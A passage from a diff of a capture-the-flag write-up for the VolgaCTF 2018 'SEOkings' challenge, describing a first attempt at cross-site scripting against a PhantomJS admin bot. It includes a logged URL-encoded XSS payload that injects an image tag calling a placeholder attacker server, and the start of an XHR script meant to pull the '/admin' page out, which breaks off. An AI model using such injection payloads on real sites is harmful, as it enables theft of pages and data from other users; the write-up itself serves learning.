NULLKrypt3rs/CTFs/VolgaCTF-2018/SEOkings.md

 188.246.233.46 - - [24/Mar/2018:17:56:25 +0000] "GET / HTTP/1.1" 200 3525 "http://localhost:8080/validator?site=%22%20/%3E%3Cimg%20src=%22http://my_server_ip_here/%22%3E%3C/img%3E" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"
 ```

-So, now I had to get the bot ( phantomJS ) to visit '/admin' , somehow .
+So, now I had to get the bot ( phantomJS ) to visit `'/admin'` , somehow .

-I tried adding iframes to the page and accessing it's content but I wasn't getting anything.
+I tried adding **iframes** to the page and accessing it's content but I wasn't getting anything.

 Told the admin about it, he suggested instead of iframe I should try using xhr.
 Well it was the first time I was doing xss , so I didn't thought I might actually solved it.

-By now it was 4 am ( IST ) and I had been doing it for the past 4 hours with somewhat little progress.
+By now it was 4 am ( IST ) and I had been doing it for the past 4 hours with somewhat very little progress.

 I started back after some good sleep and trying on some other problems.
 Later in the afternoon I made a simple script called payload.js to get the page using xhr and it's contents.

 ```
 try{
     var data = null;